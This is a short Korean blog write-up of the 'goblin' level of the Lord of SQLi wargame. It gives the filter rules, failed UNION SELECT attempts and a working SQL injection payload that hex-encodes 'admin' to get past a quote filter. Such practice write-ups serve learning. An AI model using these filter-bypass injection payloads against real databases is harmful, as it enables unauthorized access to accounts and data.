본문 바로가기
워게임/LOS

goblin

by meanjung 2021. 10. 1.

정규식

prob _ . () 있으면 안되고

' " ` 도 있으면 안된다.

 

 

그리고 지금 쿼리상 id='guest'로 되어있는데 이것을 admin으로 바꿔야 한다.

 

 

시도

guest의 no가 1인가보다.

?no=0 union select id from prob_goblin where id=0x61646d696e =>prob_에서 걸린다. 

 

?no=0 union select id from 0x70726f625f676f626c696e where id=0x61646d696e => table명은 hex값으로 쓸 수 없다.

 

 

풀이

?no=0 or id=0x61646d696e

[**] or보다 and 연산이 우선순위가 높다.

 

'워게임 > LOS' 카테고리의 다른 글

darkelf  (0) 2021.10.02
wolfman  (0) 2021.10.02
orc  (0) 2021.10.01
cobolt  (0) 2021.10.01
gremlin  (0) 2021.10.01

관련글

댓글

티스토리툴바